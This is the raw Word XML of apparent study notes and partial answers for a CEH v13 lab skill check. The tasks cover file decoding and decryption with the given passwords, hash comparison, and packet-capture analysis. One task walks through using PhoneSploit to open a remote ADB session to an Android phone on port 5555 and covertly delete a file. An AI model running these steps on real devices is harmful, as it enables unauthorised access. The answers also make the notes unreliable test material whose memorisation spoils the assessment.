      <w:r w:rsidRPr="5787A77D" w:rsidR="68B6B49B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AAA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68B6B49B" w:rsidP="5787A77D" w:rsidRDefault="68B6B49B" w14:paraId="1C83A496" w14:textId="0C11B977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5787A77D" w:rsidR="68B6B49B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>-Sniffing is done through ARP protocol*****keep in mind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="4DD516E7" w14:textId="75A99979">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off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</w:p>
    <w:p w:rsidR="26253379" w:rsidP="26253379" w:rsidRDefault="26253379" w14:paraId="0FB9CCE9" w14:textId="553E9431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</w:p>
    <w:p w:rsidR="26253379" w:rsidP="26253379" w:rsidRDefault="26253379" w14:paraId="07B53B0D" w14:textId="27C54168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5787A77D" w:rsidR="4257EF44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Lab Skill Checks Part 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B954851" w:rsidP="5787A77D" w:rsidRDefault="3B954851" w14:paraId="5F063985" w14:textId="0B53AE3E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5787A77D" w:rsidR="3B954851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1.1 An attacker has intruded into the CEHORG network with malicious intent. He has </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="3B954851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identified</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="3B954851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a vulnerability in a machine. He has encoded the machine’s IP address and left it in the database. While auditing the database, the encoded file was </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="3B954851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identified</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="3B954851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by the database admin. Decode the EncodedFile.txt file in the Document folder in the ‘EH Workstation – 2’ machine and enter the IP address as the answer. (Hint: Password to decode the file is Pa$$w0rd</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0EAD5488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  - this is the pass</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="3B954851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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47798A82" w:rsidP="5787A77D" w:rsidRDefault="47798A82" w14:paraId="6076425B" w14:textId="1BF190BB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  <w:r w:rsidRPr="5787A77D" w:rsidR="47798A82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>Crypto ques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47798A82" w:rsidP="5787A77D" w:rsidRDefault="47798A82" w14:paraId="3961A289" w14:textId="236D86BD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5787A77D" w:rsidR="47798A82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Documents folder-&gt; encoded.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7339B8A7" w:rsidP="5787A77D" w:rsidRDefault="7339B8A7" w14:paraId="73450798" w14:textId="5EBB7AA6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5787A77D" w:rsidR="7339B8A7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Will need BCTextEncoder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7339B8A7" w:rsidP="5787A77D" w:rsidRDefault="7339B8A7" w14:paraId="6A016122" w14:textId="51495CEC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  <w:r w:rsidRPr="5787A77D" w:rsidR="7339B8A7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In E drive-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7339B8A7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ceh</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7339B8A7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 xml:space="preserve"> tools-&gt;module 20 cry-&gt;Cryptography Tools-</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="7339B8A7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  <w:t>BCTextencoder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="16107EA3" w14:textId="18E0C78C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US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2704B413" w:rsidP="5787A77D" w:rsidRDefault="2704B413" w14:paraId="725067B3" w14:textId="25BC011F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2704B413">
        <w:drawing>
          <wp:inline wp14:editId="2511DFE6" wp14:anchorId="5EDEF014">
            <wp:extent cx="3924300" cy="2779712"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91009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65207d06f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7A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="074CE17E" w14:textId="129B9FCD">
      <w:pPr>
        <w:pStyle w:val="Normal"/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</w:pPr>
    </w:p>
    <w:p w:rsidR="26253379" w:rsidP="26253379" w:rsidRDefault="26253379" w14:paraId="46F1FE00" w14:textId="39B190D0">
      <w:pPr>
        <w:pStyle w:val="Normal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5787A77D" w:rsidR="2704B413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** to check cypher/hash use </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="6E5446F7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CEH v13 Lab\CEHv13 Module 13 Hacking Web Servers\Wordlists </w:t>
      </w:r>
      <w:hyperlink r:id="Rd023e300604a406e">
        <w:r w:rsidRPr="5787A77D" w:rsidR="2704B413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CyberChef</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3D074322" w:rsidRDefault="3D074322" w14:paraId="22825470" w14:textId="40B94A04"/>
    <w:p w:rsidR="62CE3349" w:rsidRDefault="62CE3349" w14:paraId="38A1D669" w14:textId="4009CBEA">
      <w:r w:rsidR="62CE3349">
        <w:rPr/>
        <w:t>1.2 The Access code of an employee was stolen from the CEHORG database. The attacker has encrypted the file using the Advance Encryption Package.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="62CE3349">
        <w:rPr/>
        <w:t xml:space="preserve"> You have been assigned a task to decrypt the file; the organization has retained the cipher file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="62CE3349">
        <w:rPr/>
        <w:t xml:space="preserve"> "AccessCode.docx.aes" in the Document folder in the "EH Workstation – 2" machine.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="62CE3349">
        <w:rPr/>
        <w:t xml:space="preserve"> Determine the access code by decrypting the file.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="62CE3349">
        <w:rPr/>
        <w:t xml:space="preserve"> Hint: Use "qwerty" as the decryption password.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="62CE3349">
        <w:rPr/>
        <w:t xml:space="preserve"> Note: Advanced Encryption Package is available at:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="62CE3349">
        <w:rPr/>
        <w:t xml:space="preserve"> E:\CEH-Tools\CEHv12 Module 20 Cryptography\Cryptography Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2EFD1E28" w:rsidP="5787A77D" w:rsidRDefault="2EFD1E28" w14:paraId="36FDADA8" w14:textId="0A3567E8">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="2EFD1E28">
        <w:drawing>
          <wp:inline wp14:editId="2E3FDAD7" wp14:anchorId="3960A296">
            <wp:extent cx="3190577" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="950506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d96e0c1df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7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7A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="6645A866" w14:textId="115BA620">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0EB844C8" w:rsidP="5787A77D" w:rsidRDefault="0EB844C8" w14:paraId="6CC4A2D5" w14:textId="1924E128">
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="0EB844C8">
        <w:rPr/>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0EB844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VeraCrypt volume file "secret" is stored on the Document folder in the "EH Workstation – 2" machine. You are an ethical hacker working with CEHORG; you have been tasked to decrypt the encrypted volume and </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0EB844C8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>determine</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0EB844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number of files stored in the volume. (Hint: Password: test) (</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0EB844C8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>video :</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="0EB844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hyperlink r:id="Re2503213436e4f05">
        <w:r w:rsidRPr="5787A77D" w:rsidR="0EB844C8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https://www.youtube.com/watch?v=eROZzRy-Hso&amp;t=360s&amp;ab_channel=FireShark</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5787A77D" w:rsidR="35137F7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time: 19:50)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="067C6BAA" w14:textId="42966CC3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AB0A08" w:rsidP="5787A77D" w:rsidRDefault="68AB0A08" w14:paraId="227A5D9D" w14:textId="1AF2AE23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68AB0A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1.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="08DD579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You have received a folder named "Archive" from a vendor. You suspect that someone might have tampered with the files during transmission. The original hashes of the files have been sent by the sender separately and are stored in a file named FileHashes.txt stored in the Document folder in the "EH Workstation – 2" machine. Your task is to check the integrity of the files by comparing the MD5 hashes. Compare the hash values and </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="08DD5799">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>determine</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="08DD579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file name that has been tampered with. Note: Exclude the file extension in the answer field. The answer is case-sensitive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="332CB71B" w:rsidP="5787A77D" w:rsidRDefault="332CB71B" w14:paraId="1721D2FB" w14:textId="6BBE8BC0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332CB7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Hash compare/calculator </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="332CB71B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>( CEH</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="332CB71B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-Tools-&gt;module 20 cryptography-&gt; md5 &amp; 6 calculator -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5B5202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open md5 calculator or md5 </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5B52021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msi.install</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5B5202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if </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5B52021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>necesary</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5B52021F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50D6937A" w:rsidP="5787A77D" w:rsidRDefault="50D6937A" w14:paraId="09989B6B" w14:textId="58EEAD69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50D693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Calculate md5 of all files of Archive folder. Then compare the hash values with </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="00ED59B5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pre-stored FileHashes.txt and give the filename as answer. Ans: Quotes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="46D936DD" w14:textId="16329DCD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787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="017431C7" w14:textId="2A91818E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787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="346A5E1E" w14:textId="1631CDAB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787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="5D3A526E" w14:textId="27065BE6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EA58A74" w:rsidP="5787A77D" w:rsidRDefault="5EA58A74" w14:paraId="4E769A22" w14:textId="432770FA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5EA58A74">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.5 CEHORG hosts multiple IoT devices and sensors to manage its supply chain fleet. You are assigned a task to examine the file "IOT Traffic.pcapng" located in the Home directory of the root user in the "EH Workstation – 1" machine. Analyze the packet and find the topic of the message sent to the sensor.</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="50D693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F04A95D" w:rsidP="5787A77D" w:rsidRDefault="0F04A95D" w14:paraId="164C86A0" w14:textId="55230903">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="0F04A95D">
        <w:drawing>
          <wp:inline wp14:editId="6FF4217E" wp14:anchorId="39F6DE14">
            <wp:extent cx="4848225" cy="2835901"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1280104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25c11adb6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4A95D" w:rsidP="5787A77D" w:rsidRDefault="0F04A95D" w14:paraId="31727F24" w14:textId="051EAE54">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="0F04A95D">
        <w:rPr/>
        <w:t>-filter-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0F04A95D">
        <w:rPr/>
        <w:t>mqtt</w:t>
      </w:r>
      <w:r w:rsidR="0F04A95D">
        <w:rPr/>
        <w:t xml:space="preserve">-&gt;publish msg-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="0F04A95D">
        <w:rPr/>
        <w:t>ans</w:t>
      </w:r>
      <w:r w:rsidR="0F04A95D">
        <w:rPr/>
        <w:t xml:space="preserve"> is according to the given </w:t>
      </w:r>
      <w:r w:rsidR="0F04A95D">
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="2023402C">
        <w:rPr/>
        <w:t>aa</w:t>
      </w:r>
      <w:r w:rsidR="2023402C">
        <w:rPr/>
        <w:t>_Aaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E1ABBAF" w:rsidP="4EB26D44" w:rsidRDefault="5E1ABBAF" w14:paraId="71B5E38E" w14:textId="1045B83E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="5E1ABBAF">
        <w:rPr/>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="260BBC13">
        <w:rPr/>
        <w:t xml:space="preserve">MQTT topic length: </w:t>
      </w:r>
      <w:r w:rsidR="5E1ABBAF">
        <w:rPr/>
        <w:t xml:space="preserve">If, for instance, you find an MQTT Publish message with a topic length of </w:t>
      </w:r>
      <w:r w:rsidR="6B6332D8">
        <w:rPr/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="5E1ABBAF">
        <w:rPr/>
        <w:t>9 characters, such as</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E1ABBAF" w:rsidP="4EB26D44" w:rsidRDefault="5E1ABBAF" w14:paraId="3DF7DE1D" w14:textId="74117C03">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="5E1ABBAF">
        <w:rPr/>
        <w:t>sensors/</w:t>
      </w:r>
      <w:r w:rsidR="5E1ABBAF">
        <w:rPr/>
        <w:t>temperature ,</w:t>
      </w:r>
      <w:r w:rsidR="5E1ABBAF">
        <w:rPr/>
        <w:t xml:space="preserve"> then the answer would be: </w:t>
      </w:r>
      <w:r w:rsidR="2493093C">
        <w:rPr/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="5E1ABBAF">
        <w:rPr/>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="20267CB5" w14:textId="3FF50848">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5CBA967B" w:rsidRDefault="5CBA967B" w14:paraId="13D509C3" w14:textId="6200E361">
      <w:r w:rsidR="5CBA967B">
        <w:rPr/>
        <w:t xml:space="preserve">1.6 </w:t>
      </w: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mobile device of an employee in CEHORG has been hacked by the hacker to perform DoS attack on one of the </w:t>
      </w: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>server</w:t>
      </w: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company network. You are assigned to </w:t>
      </w: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>analyse</w:t>
      </w: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</w:t>
      </w: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>Andro.pcapng</w:t>
      </w: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>" located in Documents directory of EH workstation-2 and identify the severity level of the attack. (Note: perform deep down Expert Info analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5787A77D" w:rsidP="5787A77D" w:rsidRDefault="5787A77D" w14:paraId="229D6FFD" w14:textId="2CF1AD1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4E09A5E5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5E56C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Related to 1.7. </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5E56C532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52F4EB02" w:rsidR="5E56C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</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5E56C532">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="5E56C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address and port 5555 as android by filtering </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FD634CC" w:rsidP="52F4EB02" w:rsidRDefault="2FD634CC" w14:paraId="6C562AF0" w14:textId="3730ED33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2FD634C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 Select android </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="2FD634CC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="2FD634C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-&gt; select analyze-&gt; expert information-&gt; severity-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="2FD634CC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ans</w:t>
      </w:r>
      <w:r w:rsidRPr="52F4EB02" w:rsidR="2FD634C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warning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FD634CC" w:rsidRDefault="2FD634CC" w14:paraId="36A1BBDC" w14:textId="7CB09A6B">
      <w:r w:rsidR="2FD634CC">
        <w:drawing>
          <wp:inline wp14:editId="1F1172E3" wp14:anchorId="77D1400C">
            <wp:extent cx="3714750" cy="2605870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1551528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d8504452b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4EB02" w:rsidP="52F4EB02" w:rsidRDefault="52F4EB02" w14:paraId="585CC482" w14:textId="0B8D0C3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CBA967B" w:rsidP="5787A77D" w:rsidRDefault="5CBA967B" w14:paraId="7CDEAB36" w14:textId="71AB61A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5CBA96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1.7 </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="32A3A2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 employee in CEHORG has secretly </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="32A3A2EB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>acquired</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="32A3A2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Confidential access ID through an application from the company. He has saved this information on the Downloads folder of his Android mobile phone. You have been assigned </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="32A3A2EB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a task</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="32A3A2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an ethical hacker to access the file and </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="32A3A2EB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="32A3A2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it covertly. Enter the account information present in the file. Note: Only provide the numeric values in the answer field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FA6C8AA" w:rsidP="5787A77D" w:rsidRDefault="1FA6C8AA" w14:paraId="327337B2" w14:textId="3C15989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1FA6C8AA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787A77D" w:rsidR="1FA6C8AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demo</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="1FA6C8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video: </w:t>
      </w:r>
      <w:hyperlink r:id="Ra4ac9246331641b0">
        <w:r w:rsidRPr="5787A77D" w:rsidR="1FA6C8AA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https://www.youtube.com/watch?v=eROZzRy-Hso&amp;t=360s&amp;ab_channel=FireShark</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5787A77D" w:rsidR="055CDA2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time: 39:00)</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="1FA6C8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7261642" w:rsidP="5787A77D" w:rsidRDefault="17261642" w14:paraId="0A483EB9" w14:textId="6777980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1726164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 default android port </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="17261642">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>range :</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="1726164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5555-5585</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E530E82" w:rsidP="5787A77D" w:rsidRDefault="6E530E82" w14:paraId="48A39C0F" w14:textId="47F12B5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6E530E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 check all </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="6E530E82">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subnets  or</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="6E530E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787A77D" w:rsidR="6E530E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single </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="6E530E82">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="6E530E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787A77D" w:rsidR="6E530E82">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to see 5555 is opened or not</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="119A65CA" w:rsidP="5787A77D" w:rsidRDefault="119A65CA" w14:paraId="11D84D74" w14:textId="4E77743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-</w:t>
      </w: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su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="119A65CA" w:rsidP="5787A77D" w:rsidRDefault="119A65CA" w14:paraId="10AED529" w14:textId="27D71A5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-cd attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="119A65CA" w:rsidP="5787A77D" w:rsidRDefault="119A65CA" w14:paraId="2D9A14B4" w14:textId="6ECD97E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-ls to see tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="119A65CA" w:rsidP="5787A77D" w:rsidRDefault="119A65CA" w14:paraId="5ED5B990" w14:textId="2E3D800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- cd Ph</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w: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oneSploit -&gt; ls-&gt; python phonesploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="119A65CA" w:rsidP="5787A77D" w:rsidRDefault="119A65CA" w14:paraId="4BD93554" w14:textId="582277F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7A77D" w:rsidR="119A65CA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-option 3-&gt; ente</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5F9236F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 </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5F9236F0">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5F9236F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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="5787A77D" w:rsidR="5F9236F0">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
